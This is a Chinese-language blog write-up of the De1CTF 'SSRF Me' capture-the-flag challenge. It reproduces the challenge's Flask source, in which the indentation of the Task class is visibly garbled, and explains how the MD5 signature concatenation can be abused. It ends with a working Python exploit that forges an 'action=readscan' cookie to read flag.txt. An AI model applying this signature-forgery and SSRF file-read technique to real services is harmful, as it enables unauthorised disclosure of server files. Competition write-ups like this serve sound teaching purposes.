De1CTF-SSRF Me_writeup

Elapse's Blog

2019-08-07

正文

题目链接：http://139.180.128.86

访问网页

得到一大串这种东西，稍微看了一下是python写的，于是放到编辑器里稍微还原一下

这里先把源码贴出来

#! /usr/bin/env python 
#encoding=utf-8 
from flask import Flask 
from flask import request 
import socket 
import hashlib 
import urllib 
import sys 
import os
import io
import json 
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='latin1')
app = Flask(__name__)
secert_key = os.urandom(16)
print(secert_key)
class Task: 
    def __init__(self, action, param, sign, ip):
        self.action = action
        self.param = param
        self.sign = sign
        self.sandbox = md5(ip)
        if(not os.path.exists(self.sandbox)):
            #SandBox For Remote_Addr
            os.mkdir(self.sandbox)
            def Exec(self):
                result = {}
                result['code'] = 500
                if (self.checkSign()):
                    if "scan" in self.action: 
                        tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
                        resp = scan(self.param)
                        if (resp == "Connection Timeout"):
                            result['data'] = resp
                        else:
                            print (resp)
                            tmpfile.write(resp)
                            tmpfile.close()
                            result['code'] = 200
                    if "read" in self.action:
                        f = open("./%s/result.txt" % self.sandbox, 'r')
                        result['code'] = 200
                        result['data'] = f.read()
                        if result['code'] == 500:
                            result['data'] = "Action Error"
                        else:
                            result['code'] = 500
                            result['msg'] = "Sign Error"
                            return result
    def checkSign(self):
        if (getSign(self.action, self.param) == self.sign):
            return True
        else: 
            return False 
            #generate Sign For Action Scan. 
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
    print("1")
    param = urllib.unquote(request.args.get("param", ""))
    action = "scan"
    return getSign(action, param)
@app.route('/De1ta',methods=['GET','POST'])
def challenge():
    action = urllib.unquote(request.cookies.get("action"))
    param = urllib.unquote(request.args.get("param", ""))
    sign = urllib.unquote(request.cookies.get("sign"))
    ip = request.remote_addr
    if(waf(param)): #不能让他执行，waf(param)必须等于false
        return "No Hacker!!!!"
    task = Task(action, param, sign, ip)
    return json.dumps(task.Exec())

@app.route('/')
def index():
    return open("code.txt","r").read()

def scan(param):
    socket.setdefaulttimeout(1)
    try:
        return urllib.urlopen(param).read()[:50]
    except:
        return "Connection Timeout"
def getSign(action, param):
    return hashlib.md5(secert_key + param + action).hexdigest()
def md5(content):
    return hashlib.md5(content).hexdigest()
def waf(param):
    check=param.strip().lower()
    if check.startswith("gopher") or check.startswith("file"):
        return True
    else:
        return False
if __name__ == '__main__':
    app.debug = False
    app.run(host='0.0.0.0',port=80)

审计一番，首先可以确认的是

1.getSign()是md5加密的，方式为一个随机的key+param+action

2.利用点在scan()，这里通过urlopen来打开文件，所以可以利用来打开flag.txt

3.前后有md5校验，所以得保证md5校验没问题

首先看这个

我们确认了利用点在scan()，而scan是在class Task中的

只有上图这部分调用了，所以可以判断到，通过get方式传入文件名就可以得到该内容了

resp = scan(self.param)
#scan()
def scan(param):
    socket.setdefaulttimeout(1)
    try:
        return urllib.urlopen(param).read()[:50]
    except:
        return "Connection Timeout"

在31行中，就会调用scan()，然后利用Urlopen()打开文件，最后通过json的方式传回给我们

但是在此之前，前面有一个校验的函数存在

首先先绕过这里的校验

这里是md5校验的部分，而加密的MD5可以通过geneSign()来得到

import requests
url="http://139.180.128.86"
file="flag.txt"
r = requests.get(url+'/geneSign?param=%sread' %file)
print(r.text)

解释一下为什么flag.txt后面得接一个read

因为在geneSign()中，不单有一个param，还有一个action,而action的值为scan，到下面加密的代码里

@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
    param = urllib.unquote(request.args.get("param", ""))
    action = "scan"
    return getSign(action, param)

def getSign(action, param):
    return hashlib.md5(secert_key + param + action).hexdigest()

是一个随机的key+param+action

也就是

key+param+’scan’

key+flag.txtread+scan 这样去加密的

回过头来看一下校验是怎么校验的

他拿action和param这两个值去加密，然后去校验我们的加密结果，所以我们得让这里的加密也是key+flag.txtread+scan 这样去加密的

解决了md5的问题后，得找一些这些值怎么传过去

在62行中，发现一个challenge()得函数，action这些是通过cookie来获取到得，而param是通过get的方式传入的

整理一下信息，就是访问的时候得这样

#cookie内容

actoin=readscan 得这样配合加密，绕过验证

sign=xxx 这里的值为前面md5加密的内容

GET
param的内容直接get传入就好了

?param=flag.txt 这样

可能到了这一步，会质疑为什么一定得存在read，如果没有read的话md5校验不是也能过吗

在39行中，有一个if是检测read是否在里面的，如果没有，那么我们即使获取到了文件内容，也输出不出来

下面是python代码

# coding:utf-8
import requests


url="http://139.180.128.86"


def getSign(param):
    r = requests.get('%s/geneSign?param=%s' % (url, param)) #http://139.180.128.86/geneSign?param/flag.txtread
    if r.status_code == 200:
        return r.text
    return ""


def Result(sign, param):
    header = {
        'Cookie': 'action=readscan; sign=%s;' % sign, #readscan过校验
    }
    r = requests.get('%s/De1ta?param=%s' % (url, param), headers=header)
    if r.status_code == 200:
        print(r.text)


file="flag.txt"
sign = getSign('%sread' % file) #flag.txtread 
Result(sign, file)